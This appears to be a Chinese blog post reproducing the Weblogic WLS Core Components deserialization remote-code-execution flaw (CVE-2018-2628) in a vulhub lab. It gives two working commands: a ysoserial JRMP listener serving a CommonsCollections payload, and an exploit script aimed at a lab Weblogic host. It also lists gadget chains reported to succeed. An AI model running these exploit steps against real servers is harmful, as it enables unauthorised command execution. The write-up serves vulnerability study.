【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
Flying_Fish_roe7 分钟前
Reactive 编程-Loom 项目(虚拟线程)
java
怒放的生命.44 分钟前
GUI编程10:窗口监听事件
java·开发语言·前端
*Soo_Young*1 小时前
JMM 模型、synchronized、volatile 关键字全解
java·后端
ZachOn1y1 小时前
Java 入门指南:Java 并发编程模式 —— 生产者-消费者模式
java·后端·java-ee·团队开发·个人开发
理想青年宁兴星1 小时前
【数据结构】字符串与JSON字符串、JSON字符串及相应数据结构(如对象与数组)之间的相互转换
java·数据结构·json
DC10201 小时前
Java 每日一刊(第6期):整数运算
java·开发语言
豆瑞瑞3 小时前
Grafana 汉化
java
Flying_Fish_roe3 小时前
AWS Lambda 与 Java
java·云计算·aws
sdg_advance4 小时前
RabbitMQ消息转换器
java·rabbitmq·java-rabbitmq
程序者王大川4 小时前
【物联网】时序数据库InfluxDB解析及1.x版本与2.x版本区别详解
java·数据库·物联网·数据采集·时序数据库·数据·工业互联网平台